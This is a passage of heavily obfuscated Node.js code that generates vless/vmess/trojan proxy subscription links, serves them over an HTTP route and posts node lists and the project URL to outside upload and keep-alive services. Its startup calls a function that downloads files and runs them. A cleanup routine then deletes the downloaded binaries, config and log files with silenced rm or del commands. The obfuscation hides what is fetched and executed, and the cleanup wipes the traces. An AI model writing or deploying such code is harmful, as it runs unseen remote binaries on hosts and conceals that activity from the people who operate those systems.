_0x5c6b5b[_0x344bfd(0x4dd,0x5b0,0x5bf,0x552)](_0x1d3109,_0x3d6ad2);},'mgkne':_0x5c6b5b[_0x23404a(0x226,0x311,0x37c,0x26a)],'vxbem':_0x3a6a52(-0x1cc,-0x1c1,-0xd6,-0x88),'Gsxrv':_0x3a6a52(0xba,0x6a,0x64,-0x97),'WXEKG':_0x5c6b5b[_0x23404a(0x128,0x1e1,0x112,0x15b)],'yJrcE':_0x23404a(0x439,0x244,0x2a5,0x2f4)+';\x20charset='+'utf-8','xdyrv':_0x5c6b5b[_0x23404a(0x2a8,0x420,0x233,0x2fa)],'Vhqdh':_0x5c6b5b[_0x23404a(0x1e2,0x1c5,0x1dc,0x12e)],'NhIsZ':_0x5c6b5b[_0x23404a(0x3a0,0x2ff,0x27a,0x28a)],'sCZMn':function(_0x4c5b1b){function _0x5bd3f4(_0x3999f5,_0x5715d5,_0x18a9a3,_0x1019a2){return _0x3a6a52(_0x3999f5-0x1ba,_0x5715d5-0x118,_0x5715d5-0x34c,_0x3999f5);}return _0x5c6b5b[_0x5bd3f4(0x2f2,0x36e,0x3a1,0x3de)](_0x4c5b1b);}};function _0x3a6a52(_0x9e0930,_0x1f1826,_0x3496ea,_0x53201e){return _0x17674d(_0x53201e,_0x1f1826-0x1ee,_0x3496ea-0x172,_0x3496ea- -0x459);}function _0x23404a(_0x2b8dbc,_0x1301c8,_0x174aa4,_0xdc8737){return _0x17674d(_0x1301c8,_0x1301c8-0xf8,_0x174aa4-0x1b,_0xdc8737- -0x2ed);}setTimeout(()=>{const _0x50e683={};_0x50e683['v']='2',_0x50e683['ps']=''+_0xddf0f,_0x50e683[_0x213fad(0x440,0x4ec,0x35d,0x537)]=CFIP,_0x50e683['port']=CFPORT,_0x50e683['id']=UUID,_0x50e683['aid']='0',_0x50e683['scy']='none',_0x50e683[_0x2766b4(0x238,0x37a,0x25f,0x495)]='ws',_0x50e683[_0x213fad(0x3fe,0x441,0x3cf,0x3e0)]=_0x414c39[_0x213fad(0x31f,0x26c,0x3b3,0x429)],_0x50e683[_0x2766b4(0x4bb,0x3f1,0x3e4,0x331)]=_0x41ee25,_0x50e683[_0x213fad(0x4bf,0x404,0x48f,0x385)]=_0x414c39[_0x2766b4(0x431,0x43e,0x533,0x428)],_0x50e683[_0x213fad(0x58e,0x55a,0x4e9,0x6b2)]=_0x414c39['NhIsZ'],_0x50e683[_0x2766b4(0x3c9,0x4e5,0x3b5,0x4fe)]=_0x41ee25,_0x50e683[_0x213fad(0x54b,0x51b,0x5d9,0x623)]='',_0x50e683['fp']=_0x2766b4(0x30e,0x374,0x28e,0x35c);const _0x2bcad6=_0x50e683,_0x181eec=_0x2766b4(0x369,0x496,0x3b0,0x5c7)+UUID+'@'+CFIP+':'+CFPORT+(_0x213fad(0x52f,0x4bf,0x619,0x671)+'n=none&sec'+_0x213fad(0x426,0x3bf,0x3a5,0x2df)+_0x2766b4(0x3e1,0x3bd,0x456,0x3fc))+_0x41ee25+(_0x213fad(0x455,0x43e,0x31f,0x4a7)+_0x2766b4(0x4a3,0x412,0x4f0,0x458)+_0x2766b4(0x341,0x3e5,0x4ce,0x420))+_0x41ee25+(_0x2766b4(0x314,0x308,0x3f7,0x3de)+_0x213fad(0x3de,0x395,0x367,0x33e)+'3Fed%3D256'+'0#')+_0xddf0f+_0x213fad(0x31b,0x30a,0x1f0,0x3eb)+Buffer[_0x213fad(0x3d0,0x2d9,0x377,0x3f9)](JSON[_0x213fad(0x376,0x31f,0x3f7,0x3be)](_0x2bcad6))[_0x2766b4(0x2e8,0x2e3,0x3d6,0x28b)](_0x414c39['Gsxrv'])+(_0x2766b4(0x40e,0x4cf,0x469,0x392)+'/')+UUID+'@'+CFIP+':'+CFPORT+('?security='+_0x2766b4(0x3c6,0x49d,0x4e5,0x4de))+_0x41ee25+(_0x213fad(0x455,0x3f2,0x583,0x464)+_0x2766b4(0x4a7,0x412,0x33d,0x512)+_0x213fad(0x496,0x529,0x3e2,0x593))+_0x41ee25+(_0x2766b4(0x3cf,0x2f8,0x2e0,0x27a)+_0x2766b4(0x3ff,0x34c,0x24d,0x384)+_0x2766b4(0x3bf,0x291,0x309,0x169)+'60#')+_0xddf0f+'\x0a\x20\x20\x20\x20';console[_0x213fad(0x53c,0x564,0x414,0x58d)](Buffer[_0x2766b4(0x239,0x31f,0x35a,0x2aa)](_0x181eec)['toString'](_0x2766b4(0x323,0x3c5,0x3fb,0x517))),fs[_0x213fad(0x489,0x486,0x510,0x388)+_0x213fad(0x506,0x508,0x539,0x5a9)](subPath,Buffer['from'](_0x181eec)[_0x213fad(0x394,0x285,0x492,0x2a3)](_0x414c39[_0x213fad(0x480,0x473,0x33f,0x4ee)])),console[_0x2766b4(0x434,0x48b,0x57c,0x47c)](FILE_PATH+('/sub.txt\x20s'+'aved\x20succe'+'ssfully'));function _0x213fad(_0x3f5cee,_0x5ae9dd,_0x37e481,_0x127fbb){return _0x3a6a52(_0x3f5cee-0xcc,_0x5ae9dd-0x165,_0x3f5cee-0x412,_0x5ae9dd);}_0x414c39[_0x2766b4(0x4dd,0x474,0x3a0,0x544)](uploadNodes);function _0x2766b4(_0x42b301,_0x1fa338,_0x4c92f7,_0x586044){return _0x23404a(_0x42b301-0x127,_0x586044,_0x4c92f7-0x1d4,_0x1fa338-0x1f5);}app[_0x2766b4(0x21e,0x334,0x24b,0x3dc)]('/'+SUB_PATH,(_0x531366,_0x4c0827)=>{function _0x11f696(_0xbb65cd,_0xf05091,_0x2a974d,_0x3193bd){return _0x213fad(_0xbb65cd- -0x46,_0xf05091,_0x2a974d-0x4e,_0x3193bd-0x149);}function _0x57273c(_0x14d059,_0x2597b2,_0x4a3708,_0x8ed8ed){return _0x213fad(_0x14d059- -0x73,_0x8ed8ed,_0x4a3708-0xc7,_0x8ed8ed-0x1d0);}if(_0x414c39['CkzER'](_0x414c39[_0x11f696(0x368,0x3e9,0x2b0,0x4a6)],_0x414c39[_0x11f696(0x3ab,0x399,0x3ff,0x42e)])){const _0x54dfc9=Buffer[_0x57273c(0x35d,0x2d2,0x335,0x2ae)](_0x181eec)[_0x11f696(0x34e,0x46c,0x465,0x20b)](_0x414c39['Gsxrv']);_0x4c0827['set'](_0x414c39['WXEKG'],_0x414c39[_0x11f696(0x4f1,0x4dc,0x4b8,0x499)]),_0x4c0827[_0x11f696(0x55d,0x6a5,0x4f6,0x4df)](_0x54dfc9);}else _0x41743c[_0x11f696(0x4f6,0x62a,0x5a7,0x436)](_0x57273c(0x53d,0x405,0x482,0x626)+'t\x20success\x20'+_0x57273c(0x3b1,0x33f,0x34d,0x26c)+_0x37ff60+':\x20'+_0x20f229[_0x57273c(0x321,0x1ff,0x1f5,0x406)](0x16b7+-0x7*-0x328+-0x2cc7));}),_0x1b98a6(_0x181eec);},0x1*-0x1ac3+-0xc03+0x1*0x2e96);});}}}async function uploadNodes(){const _0x38668b={};_0x38668b[_0x3cf7a0(0x2e9,0x28a,0x447,0x387)]=function(_0xa00314,_0xc8ca84){return _0xa00314<_0xc8ca84;},_0x38668b['YvaaS']=_0x3cf7a0(0x27e,0x34e,0x127,0x275)+'d64.ssss.n'+_0x57769a(0x3bf,0x3a4,0x335,0x2fb),_0x38668b['PygcR']=_0x57769a(0x289,0x3a8,0x29e,0x1f6)+_0x3cf7a0(0x3b7,0x42d,0x407,0x34d)+_0x3cf7a0(0x332,0x2f8,0x31d,0x42d),_0x38668b[_0x57769a(0x48f,0x29b,0x36f,0x4ac)]='--tls',_0x38668b[_0x57769a(0x375,0x4bc,0x452,0x3bf)]=function(_0x24038a,_0x3f4ad7){return _0x24038a&&_0x3f4ad7;},_0x38668b[_0x57769a(0x359,0x56a,0x42c,0x483)]=function(_0x267d28,_0x322889){return _0x267d28!==_0x322889;},_0x38668b[_0x57769a(0x3a7,0x2fb,0x2e2,0x23b)]=_0x57769a(0x373,0x213,0x27b,0x369),_0x38668b['wXoKX']='Subscripti'+_0x57769a(0x47c,0x41a,0x3dc,0x3dd)+'d\x20successf'+_0x57769a(0x1e1,0x22a,0x310,0x3bb),_0x38668b['jkYlS']=function(_0x1bb3b3,_0x298f09){return _0x1bb3b3===_0x298f09;},_0x38668b['IyHfO']=_0x3cf7a0(0x3ff,0x3ab,0x419,0x340),_0x38668b[_0x57769a(0x47e,0x318,0x360,0x2b5)]=function(_0x303b2e,_0x235084){return _0x303b2e!==_0x235084;},_0x38668b[_0x57769a(0x1c7,0x38a,0x307,0x281)]=_0x3cf7a0(0x408,0x1ae,0x35c,0x2e9);function _0x3cf7a0(_0x30f87b,_0x35f124,_0x3b8489,_0x16fb41){return _0x51c265(_0x16fb41- -0x15d,_0x35f124-0x26,_0x3b8489,_0x16fb41-0x105);}_0x38668b[_0x57769a(0x32f,0xdf,0x200,0x2d5)]=_0x3cf7a0(0x261,0x13f,0x332,0x25a)+_0x3cf7a0(0x328,0x1e4,0x288,0x2ed),_0x38668b[_0x3cf7a0(0x3bb,0x41f,0x482,0x423)]=function(_0x21841d,_0x486e99){return _0x21841d===_0x486e99;},_0x38668b[_0x57769a(0x361,0x396,0x398,0x33c)]=_0x3cf7a0(0x255,0x320,0x2e9,0x1f7),_0x38668b[_0x3cf7a0(0x340,0x4dc,0x411,0x39c)]=_0x57769a(0x43b,0x32a,0x2ee,0x291),_0x38668b[_0x57769a(0x379,0x493,0x3d1,0x426)]=_0x3cf7a0(0x2eb,0x386,0x2aa,0x37d)+'aded\x20succe'+'ssfully',_0x38668b[_0x57769a(0x136,0x233,0x263,0x357)]=function(_0xd56959,_0x4bdfde){return _0xd56959!==_0x4bdfde;};function _0x57769a(_0x46807b,_0x9ea220,_0x443616,_0x9f473e){return _0x50d979(_0x46807b-0x18e,_0x9ea220-0x91,_0x443616-0x10d,_0x9f473e);}_0x38668b[_0x3cf7a0(0x40c,0x1d5,0x2ca,0x2fa)]=_0x3cf7a0(0x34d,0x28d,0x41d,0x34f),_0x38668b[_0x57769a(0x2fa,0x2b2,0x362,0x369)]=_0x57769a(0x319,0x422,0x3bc,0x3e7);const _0x5643ff=_0x38668b;if(_0x5643ff[_0x3cf7a0(0x3f1,0x521,0x4d1,0x429)](UPLOAD_URL,PROJECT_URL)){const _0x31c69f=PROJECT_URL+'/'+SUB_PATH,_0x134b70={};_0x134b70[_0x57769a(0x39f,0x373,0x2c8,0x38f)+'on']=[_0x31c69f];const _0x523f29=_0x134b70;try{if(_0x5643ff[_0x3cf7a0(0x38e,0x4a2,0x379,0x403)](_0x5643ff[_0x57769a(0x2d6,0x323,0x2e2,0x362)],_0x57769a(0x3b0,0x286,0x27b,0x17b))){const _0xc52ea5='abcdefghij'+_0x57769a(0x2b4,0x423,0x357,0x28f)+_0x57769a(0x49f,0x445,0x460,0x516);let _0x24a90a='';for(let _0x211ba6=0x210e+0x1b4f+0x141f*-0x3;_0x5643ff[_0x57769a(0x3b9,0x3f6,0x3b0,0x448)](_0x211ba6,0x2284*-0x1+0x2fe*-0x1+0x2588);_0x211ba6++){_0x24a90a+=_0xc52ea5['charAt'](_0x21701b[_0x57769a(0x33e,0x430,0x37f,0x3f3)](_0x58e497['random']()*_0xc52ea5['length']));}return _0x24a90a;}else{const _0x39038a={};_0x39038a[_0x57769a(0x3ff,0x36f,0x318,0x253)+'pe']=_0x57769a(0x3cc,0x1c4,0x283,0x332)+_0x57769a(0x44a,0x260,0x316,0x307);const _0xcecb39={};_0xcecb39['headers']=_0x39038a;const _0x3a3c66=await axios['post'](UPLOAD_URL+(_0x57769a(0x518,0x3eb,0x437,0x307)+_0x3cf7a0(0x1ea,0x245,0x28a,0x1d4)+'ns'),_0x523f29,_0xcecb39);return _0x3a3c66&&_0x3a3c66[_0x3cf7a0(0x1f4,0x1aa,0x167,0x2ac)]===-0x3*0x9d9+0x1707+0x74c?(console[_0x57769a(0x2d4,0x305,0x41b,0x2e3)](_0x5643ff[_0x3cf7a0(0x2fd,0x112,0x246,0x228)]),_0x3a3c66):null;}}catch(_0x313441){if(_0x313441[_0x3cf7a0(0x206,0x192,0x28c,0x21a)]){if(_0x5643ff[_0x57769a(0x28d,0x375,0x24c,0x36a)](_0x313441[_0x57769a(0x204,0x207,0x243,0x248)][_0x3cf7a0(0x3da,0x1c8,0x303,0x2ac)],0x6bf*-0x4+-0x1320+0x2fac)){}}}}else{if(UPLOAD_URL){if(!fs[_0x3cf7a0(0x247,0x110,0x302,0x1ef)](listPath))return;const _0x15d874=fs[_0x3cf7a0(0x24c,0x1ba,0x374,0x2d9)+'nc'](listPath,_0x5643ff[_0x57769a(0x278,0x3fe,0x3a8,0x4d5)]),_0x4a1e61=_0x15d874[_0x3cf7a0(0x467,0x454,0x30d,0x43a)]('\x0a')[_0x57769a(0x3a8,0x365,0x382,0x3f3)](_0x2b07ef=>/(vless|vmess|trojan|hysteria2|tuic):\/\//['test'](_0x2b07ef));if(_0x5643ff[_0x3cf7a0(0x1e6,0x162,0x2e9,0x223)](_0x4a1e61[_0x57769a(0x2f4,0x4d9,0x3e7,0x2fc)],-0x150d+-0x1*0x1f09+-0x3b*-0xe2))return;const _0x38d550={};_0x38d550['nodes']=_0x4a1e61;const _0x10347d=JSON['stringify'](_0x38d550);try{if(_0x5643ff[_0x3cf7a0(0x2c5,0x405,0x269,0x337)](_0x3cf7a0(0x32b,0x342,0x1c0,0x2e9),_0x5643ff[_0x57769a(0x2b6,0x347,0x307,0x393)]))return _0x1e63d6[_0x3cf7a0(0x35b,0x46e,0x44c,0x3a9)]['countryCod'+'e']+'_'+_0x35f86c[_0x3cf7a0(0x4dc,0x2a6,0x451,0x3a9)][_0x3cf7a0(0x294,0x163,0x15d,0x215)];else{const _0x214970={};_0x214970['Content-Ty'+'pe']=_0x5643ff[_0x57769a(0x237,0x1cc,0x200,0x1e9)];const _0x1e3eeb={};_0x1e3eeb['headers']=_0x214970;const _0x515332=await axios[_0x3cf7a0(0x175,0x181,0x256,0x221)](UPLOAD_URL+(_0x57769a(0x4e6,0x344,0x425,0x49d)+_0x57769a(0x56b,0x43a,0x461,0x424)),_0x10347d,_0x1e3eeb);if(_0x515332&&_0x5643ff['jkYlS'](_0x515332[_0x57769a(0x30f,0x18b,0x2d5,0x338)],-0x128*0x1d+0x19eb+0x865))return _0x5643ff['NEToc'](_0x5643ff['MquLX'],_0x5643ff[_0x3cf7a0(0x2a6,0x3b5,0x4b0,0x39c)])?null:(console[_0x57769a(0x3d8,0x2cf,0x41b,0x2e0)](_0x5643ff[_0x57769a(0x3ef,0x321,0x3d1,0x51d)]),_0x515332);else{if(_0x5643ff[_0x3cf7a0(0x13e,0x382,0x279,0x23a)](_0x57769a(0x32b,0x3ad,0x378,0x228),_0x5643ff['RdLPy'])){const _0x97914d={};_0x97914d['fileName']=_0x30a82a,_0x97914d[_0x3cf7a0(0x380,0x4a4,0x516,0x3ea)]=_0x5643ff[_0x57769a(0x277,0x2c7,0x297,0x32f)];const _0x390041={};_0x390041[_0x57769a(0x32d,0x36a,0x346,0x39f)]=_0x477d7c,_0x390041[_0x3cf7a0(0x516,0x33b,0x30a,0x3ea)]=_0x5643ff[_0x3cf7a0(0x3b0,0x322,0x491,0x3c0)],_0x5f2d1f=[_0x97914d,_0x390041];}else return null;}}}catch(_0x158a09){if(_0x5643ff[_0x3cf7a0(0x3c5,0x253,0x23f,0x339)]!==_0x5643ff[_0x3cf7a0(0x34b,0x3f0,0x222,0x339)])_0x31deff[_0x57769a(0x1a1,0x1d5,0x20c,0x161)]('php\x20runnin'+'g\x20error:\x20'+_0xc6d9e5);else return null;}}else{if(_0x3cf7a0(0x4f7,0x3d2,0x2e7,0x3bb)==='qIOZn')_0x352bf4=_0x5643ff[_0x57769a(0x296,0x2ac,0x36f,0x313)];else return;}}}function cleanFiles(){function _0x1997f6(_0x352997,_0x57c980,_0xcc957e,_0x164341){return _0x50d979(_0x352997-0x136,_0x57c980-0x74,_0xcc957e- -0x2c2,_0x164341);}function _0x59c08f(_0x8adc19,_0x2e4bd0,_0x2a5a81,_0x510931){return _0x50d979(_0x8adc19-0x12c,_0x2e4bd0-0xf1,_0x2a5a81-0x3f0,_0x2e4bd0);}const _0x8e813b={'Wnilh':_0x1997f6(0xc4,-0x46,0xbf,-0x17)+_0x59c08f(0x4b9,0x512,0x524,0x439),'jFkLT':_0x59c08f(0x4b9,0x662,0x52c,0x636)+_0x1997f6(0x12a,0x68,-0xf,-0x7a)+'this\x20scrip'+_0x1997f6(-0x75,-0x13a,-0x17c,-0x224),'YWAXl':function(_0x237074,_0x4286dc){return _0x237074&&_0x4286dc;},'bxcLp':function(_0x2b6657,_0x4dc08b){return _0x2b6657===_0x4dc08b;},'EwQEC':_0x1997f6(0x16c,-0x62,0xb6,-0x76),'NgueN':function(_0x114c16,_0x5cca43,_0x5d5bf4){return _0x114c16(_0x5cca43,_0x5d5bf4);},'KSFqD':function(_0x472a33,_0x32ba8d,_0x1e7ccf){return _0x472a33(_0x32ba8d,_0x1e7ccf);}};_0x8e813b[_0x1997f6(-0x7f,0x95,0xc9,0x144)](setTimeout,()=>{function _0x493a04(_0x2e9ad1,_0x13e8a2,_0x290e4c,_0x582b23){return _0x59c08f(_0x2e9ad1-0x11b,_0x2e9ad1,_0x582b23- -0x22b,_0x582b23-0x69);}const _0x219e8e=[bootLogPath,configPath,webPath,botPath];if(NEZHA_PORT)_0x219e8e['push'](npmPath);else _0x8e813b[_0x493a04(0x3b8,0x517,0x491,0x44a)](NEZHA_SERVER,NEZHA_KEY)&&_0x219e8e['push'](phpPath);function _0x566ef2(_0x402386,_0x585dd4,_0x1fc097,_0x83dde6){return _0x59c08f(_0x402386-0x110,_0x1fc097,_0x83dde6- -0x243,_0x83dde6-0x1b2);}_0x8e813b[_0x566ef2(0x38a,0x1b6,0x34a,0x2be)](process[_0x566ef2(0x161,0x3d9,0x29c,0x299)],_0x8e813b[_0x493a04(0x51f,0x295,0x301,0x3e7)])?_0x8e813b[_0x566ef2(0x659,0x5e4,0x64b,0x538)](exec,'del\x20/f\x20/q\x20'+_0x219e8e[_0x493a04(0x5ad,0x386,0x5b3,0x466)]('\x20')+(_0x493a04(0x31f,0x4e3,0x3f0,0x3d1)+'1'),_0x1008f6=>{console[_0x1a3718(0x3eb,0x28d,0x425,0x34a)](),console[_0x8704c8(0x471,0x487,0x3ba,0x395)](_0x8e813b[_0x8704c8(0x3ce,0x372,0x331,0x2a8)]);function _0x8704c8(_0x375eef,_0x1d6a0f,_0xe590f,_0x177100){return _0x566ef2(_0x375eef-0xbe,_0x1d6a0f-0x11d,_0x177100,_0x1d6a0f- -0x34);}function _0x1a3718(_0x173850,_0x273373,_0x429616,_0x30b290){return _0x493a04(_0x429616,_0x273373-0x5e,_0x429616-0x7c,_0x30b290-0xe);}console[_0x8704c8(0x4ba,0x487,0x5b6,0x4be)](_0x8e813b[_0x1a3718(0x49f,0x4d2,0x566,0x434)]);}):_0x8e813b[_0x493a04(0x288,0x1d2,0x42a,0x2f7)](exec,_0x566ef2(0x536,0x41f,0x5c4,0x49b)+_0x219e8e['join']('\x20')+('\x20>/dev/nul'+_0x566ef2(0x437,0x30b,0x2cb,0x3da)),_0x58216a=>{function _0x382a90(_0x1bbaf7,_0x32fe30,_0x3ce720,_0x5b84d6){return _0x493a04(_0x32fe30,_0x32fe30-0x1e5,_0x3ce720-0x6e,_0x1bbaf7- -0x7);}console[_0x382a90(0x335,0x343,0x349,0x39a)](),console[_0x2e580e(0x5bd,0x549,0x666,0x645)](_0x8e813b[_0x382a90(0x3b7,0x300,0x400,0x2a0)]);function _0x2e580e(_0x2a5ea5,_0x371c87,_0x58945c,_0x299465){return _0x566ef2(_0x2a5ea5-0x5d,_0x371c87-0x83,_0x2a5ea5,_0x58945c-0x1ab);}console['log'](_0x8e813b[_0x382a90(0x41f,0x51e,0x537,0x380)]);});},0x10793*0x1+0x1d2fc+-0x17aff);}cleanFiles();async function AddVisitTask(){function _0x566792(_0x3e815d,_0x17bfa9,_0x43478c,_0x264e46){return _0x50d979(_0x3e815d-0x122,_0x17bfa9-0x12b,_0x264e46- -0x280,_0x3e815d);}const _0x1a893e={'mbpUM':_0x491ad3(0x8d,-0x5d,0x1c6,0x35),'tdpEx':_0x566792(-0x23c,-0x1d9,-0x27d,-0x15c),'VkqHL':_0x491ad3(0x1b,-0xb9,0x10f,0x146)+_0x566792(-0x2e,0x10d,-0x14c,-0x34),'ZTJyI':_0x566792(-0x196,-0x9a,-0xd9,-0x89),'wranE':function(_0x2327dd){return _0x2327dd();},'YohBH':function(_0x2d0c44,_0x2247e6){return _0x2d0c44||_0x2247e6;},'CqhBL':'Skipping\x20a'+'dding\x20auto'+_0x566792(-0x29,-0x270,-0x50,-0x161)+'ss\x20task','gjOUE':_0x566792(-0xe,0x18b,-0x62,0xac)+_0x566792(0x3a,0x1b8,0x41,0xe7)+_0x566792(0xcd,-0x4c,0x98,0x65)+'l','wjydh':_0x491ad3(-0x45,0x41,-0x2e,-0xcc)+_0x566792(-0x17e,-0x3e,-0x123,-0x77),'SnYjG':function(_0x58f0f3,_0x143bb0){return _0x58f0f3!==_0x143bb0;},'nIGdt':_0x566792(-0xbb,0x1a5,0xb6,0x74)};function _0x491ad3(_0x570099,_0x2039b2,_0x2f6215,_0x196837){return _0x50d979(_0x570099-0x60,_0x2039b2-0xb2,_0x570099- -0x1bb,_0x2039b2);}if(_0x1a893e[_0x566792(0x1dc,0x1bf,0x75,0x106)](!AUTO_ACCESS,!PROJECT_URL)){console[_0x566792(-0xa5,0xab,0xf8,0x8e)](_0x1a893e[_0x491ad3(0xa4,-0x4e,-0x3c,0x89)]);return;}try{const _0x8252c={};_0x8252c[_0x566792(-0x175,-0xe7,-0x2c,-0x95)]=PROJECT_URL;const _0xabae32=await axios['post'](_0x1a893e[_0x491ad3(-0x6f,0x1f,-0x14d,-0x15c)],_0x8252c,{'headers':{'Content-Type':_0x1a893e['wjydh']}});return console['log']('automatic\x20'+'access\x20tas'+_0x566792(-0x123,-0xe4,-0x18d,-0xba)+'ccessfully'),_0xabae32;}catch(_0x25d42e){if(_0x1a893e['SnYjG'](_0x491ad3(0x19,0xf4,0x5e,-0xd2),_0x1a893e['nIGdt']))return console[_0x491ad3(-0xbc,-0x132,0x46,-0x1a8)]('Add\x20automa'+'tic\x20access'+'\x20task\x20fail'+_0x491ad3(0x122,0x21,0x168,0x86)+_0x25d42e[_0x566792(0x1c2,0x10b,0x220,0xcf)]),null;else{const _0x80fd3a={};_0x80fd3a[_0x491ad3(0xab,0x174,-0x54,0x1de)]=_0x1a893e['mbpUM'],_0x80fd3a[_0x491ad3(-0xd1,-0xd,-0x56,-0x39)]=_0x491ad3(0x50,-0x87,-0xc4,0x2c)+'pe';const _0x5e2152=_0x80fd3a,_0xa10c66={};_0xa10c66['v']='2',_0xa10c66['ps']=''+_0x5e7e6b,_0xa10c66[_0x566792(0x25,0x30,-0x59,-0x6e)]=_0x36910e,_0xa10c66[_0x491ad3(0xf3,0x166,-0x55,0x208)]=_0x2906dc,_0xa10c66['id']=_0x185736,_0xa10c66[_0x491ad3(0x1a3,0x1b9,0x169,0x102)]='0',_0xa10c66['scy']=_0x1a893e[_0x491ad3(0x1cc,0x1ae,0x1b7,0x2a7)],_0xa10c66['net']='ws',_0xa10c66['type']=_0x491ad3(-0x97,-0x1ba,-0x1,0x42),_0xa10c66[_0x491ad3(0xb9,-0x3d,0x1c9,-0x1d)]=_0x2093b8,_0xa10c66[_0x491ad3(0xd6,-0x2b,0x21e,0x1aa)]=_0x1a893e['VkqHL'],_0xa10c66[_0x491ad3(0x1a5,0x12f,0x24d,0x23e)]=_0x491ad3(0x1a5,0x1d4,0x263,0x284),_0xa10c66['sni']=_0x285fef,_0xa10c66[_0x491ad3(0x162,0x190,0x209,0x38)]='',_0xa10c66['fp']=_0x1a893e[_0x566792(0xd4,-0xca,0xd1,0x0)];const _0x2ea8c4=_0xa10c66,_0xac26be=_0x566792(-0x3b,0xad,-0x47,0x99)+_0x51ef5c+'@'+_0x368b5e+':'+_0x5686ff+(_0x491ad3(0x146,0x131,0x27f,0x150)+_0x491ad3(0x41,0x15f,0x2,0xde)+_0x491ad3(0x3d,0xd1,0xc8,0x7e)+_0x566792(-0x181,-0x158,0x1b,-0x40))+_0x33913a+(_0x491ad3(0x6c,0xf0,-0xcf,-0x9b)+_0x491ad3(0xda,0xe7,0x114,0x12)+_0x566792(-0x3d,0xb1,-0x1d,-0x18))+_0x35b8c4+(_0x566792(-0x135,-0x128,-0x3a,-0xf5)+_0x491ad3(-0xb,0x33,0xcd,-0x4b)+_0x566792(0x67,-0x50,-0x33,0xf3)+'0#')+_0x3babfc+'\x0a\x0avmess://'+_0x43d2c0['from'](_0x347e3b[_0x491ad3(-0x73,-0x137,-0x148,0x29)](_0x2ea8c4))[_0x491ad3(-0x55,-0x191,-0xea,-0x193)](_0x1a893e['mbpUM'])+(_0x491ad3(0x197,0xa8,0x218,0x1e2)+'/')+_0x2c3ce6+'@'+_0x2f05df+':'+_0x3798b1+('?security='+_0x566792(-0xc,0xc1,-0x17,0xa0))+_0xb6d04f+(_0x491ad3(0x6c,0x17a,0x189,0x3a)+_0x566792(-0xc,0x52,0x30,0x15)+_0x491ad3(0xad,-0x4c,0x1c4,-0x83))+_0x17dac6+(_0x491ad3(-0x40,0xdb,0x112,-0x2e)+_0x491ad3(0x14,0xe8,-0x9a,0x77)+_0x566792(-0x1a2,-0x110,-0xb8,-0x16c)+_0x491ad3(0x101,0x241,0xaa,0xc7))+_0x4c5ff7+_0x566792(-0x3d,-0x189,-0xdc,-0xcb);_0x525787[_0x566792(0x82,0x2e,0x1e,0x8e)](_0x146373[_0x566792(-0xc5,0x21,-0x216,-0xde)](_0xac26be)[_0x566792(-0x90,-0x7,-0x24f,-0x11a)](_0x1a893e[_0x566792(0x208,-0x26,0x3,0xbc)])),_0x38f15a[_0x566792(0x123,-0x13d,0x3b,-0x25)+_0x491ad3(0x11d,0x3,0x186,0x222)](_0x24eb62,_0x4bb99b[_0x491ad3(-0x19,-0x122,0x5d,-0x40)](_0xac26be)[_0x566792(-0x226,-0xb1,-0x11c,-0x11a)](_0x1a893e[_0x566792(-0x17,0x1c,0x26,0xbc)])),_0x363396['log'](_0x455b10+('/sub.txt\x20s'+_0x566792(0x106,0x132,-0x7f,0x63)+'ssfully')),_0x1a893e['wranE'](_0x22c6f8),_0x10e87a[_0x566792(-0x9a,0x7a,-0xa6,-0xc9)]('/'+_0x413dd9,(_0x16dc10,_0x4cfc22)=>{function _0x1226a3(_0x4382f7,_0x4b0459,_0x49fc60,_0x2d6c76){return _0x566792(_0x4b0459,_0x4b0459-0x2b,_0x49fc60-0xba,_0x49fc60-0x3c4);}const _0x2da69e=_0x450594['from'](_0xac26be)[_0x19f0c4(0x278,0x26a,0x1ad,0xac)](_0x5e2152[_0x19f0c4(0x310,0x240,0x2ad,0x3fd)]);_0x4cfc22[_0x1226a3(0x34a,0x448,0x365,0x493)](_0x5e2152[_0x19f0c4(0x22,0x106,0x131,0x178)],_0x19f0c4(0x2c7,0x366,0x3b3,0x4c7)+_0x1226a3(0x3f5,0x295,0x302,0x3df)+_0x19f0c4(0x365,0x3a1,0x2a3,0x210));function _0x19f0c4(_0x45f2d6,_0x6a7d69,_0x1d7eb9,_0x176dba){return _0x491ad3(_0x1d7eb9-0x202,_0x45f2d6,_0x1d7eb9-0xeb,_0x176dba-0x166);}_0x4cfc22['send'](_0x2da69e);}),_0x473ad7(_0xac26be);}}}function _0x50d979(_0x4bf896,_0x16c82e,_0x1376b1,_0x52c78c){return _0x43ed(_0x1376b1- -0x6c,_0x52c78c);}async function startserver(){function _0xef5586(_0x16d541,_0xe36ff0,_0x3d3fb0,_0x4d23ea){return _0x51c265(_0x16d541-0x159,_0xe36ff0-0xb3,_0xe36ff0,_0x4d23ea-0xe1);}const _0x1e2e4c={'jFqkY':'3|2|1|4|0|'+'5|6','SynFH':function(_0x188d4f){return _0x188d4f();},'yeFxk':function(_0x20871e){return _0x20871e();},'MRXDk':function(_0x3c61c0){return _0x3c61c0();},'DcIjB':_0xef5586(0x51d,0x46c,0x583,0x59d)+_0xef5586(0x52a,0x538,0x62e,0x66b)+':'};function _0x460fb6(_0xbf489,_0x97a004,_0x4927df,_0x4df9d1){return _0x51c265(_0x97a004- -0x476,_0x97a004-0x194,_0xbf489,_0x4df9d1-0x178);}try{const _0x49111a=_0x1e2e4c['jFqkY'][_0xef5586(0x6f0,0x780,0x791,0x7ae)]('|');let _0x3c9219=-0xb*0x1d1+-0x1c60+0x305b;while(!![]){switch(_0x49111a[_0x3c9219++]){case'0':await downloadFilesAndRun();continue;case'1':_0x1e2e4c['SynFH'](cleanupOldFiles);continue;case'2':_0x1e2e4c[_0xef5586(0x6e2,0x7d3,0x6c8,0x5e2)](deleteNodes);continue;case'3':_0x1e2e4c[_0xef5586(0x49c,0x44d,0x399,0x46a)](argoType);continue;case'4':await generateConfig();continue;case'5':await _0x1e2e4c[_0x460fb6(-0x20c,-0x11e,-0x94,-0x23c)](extractDomains);continue;case'6':await _0x1e2e4c[_0xef5586(0x4b1,0x421,0x463,0x3c3)](AddVisitTask);continue;}break;}}catch(_0xc1bebb){console[_0xef5586(0x499,0x4c1,0x4ac,0x3cc)](_0x1e2e4c[_0x460fb6(-0xf8,-0xb1,-0x143,-0x5c)],_0xc1bebb);}}startserver()[_0x50d979(0xfb,0x16c,0x234,0x1b6)](_0x4ddaf2=>{function _0xdd838b(_0x37fd62,_0x1cf131,_0x2437ac,_0x53488c){return _0x51c265(_0x53488c-0xc3,_0x1cf131-0x6f,_0x1cf131,_0x53488c-0x19);}const 